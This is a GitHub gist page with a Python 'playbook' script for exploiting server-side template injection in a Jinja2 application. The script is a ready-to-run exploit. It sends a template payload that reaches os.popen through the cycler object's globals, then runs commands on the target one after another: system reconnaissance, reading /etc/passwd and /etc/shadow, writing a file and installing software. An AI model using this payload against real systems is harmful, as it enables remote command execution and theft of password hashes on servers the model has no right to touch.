Skip to content

Instantly share code, notes, and snippets.

@0xAungkon

0xAungkon/ssti.py

Created April 19, 2025 20:06
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save 0xAungkon/70cd8ad58a364090641c9a262d634181 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save 0xAungkon/70cd8ad58a364090641c9a262d634181 to your computer and use it in GitHub Desktop.
Download ZIP
SSTI - Server Side Template Injection Attack - Playbook
Raw
ssti.py
# %%
# Import libraries
import requests
import html
# %%
# predefined variables like header and website vulnarable url parameter
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language': 'en-US,en;q=0.9',
'Cache-Control': 'max-age=0',
'Content-Type': 'application/x-www-form-urlencoded',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36',
}
url='http://example.com'
# send payload to server
def send_payload(payload):
data = {
'content': payload,
}
response = requests.post(url, headers=headers, data=data, verify=False)
response = response.text
# clean the response , unnessary objects .
response=response.split('<h1 style="font-size:100px;" align="center">')[1]
response=response.split('</h1>')[0]
response=html.unescape(response)
return response
# %%
# Get information about os
command='cat /etc/os-release'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
# %%
# Read current user
command='whoami'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
# %%
# Read passwd file
command='cat /etc/passwd'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
# %%
# Read shadow file
command='cat /etc/shadow'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
# %%
command='ps aux'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
# %%
command='echo "hellow" > test.txt'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
# %%
command='apt update ; apt install apache2 -y'
response=send_payload("{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"+command+"').read() }}")
print(response)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment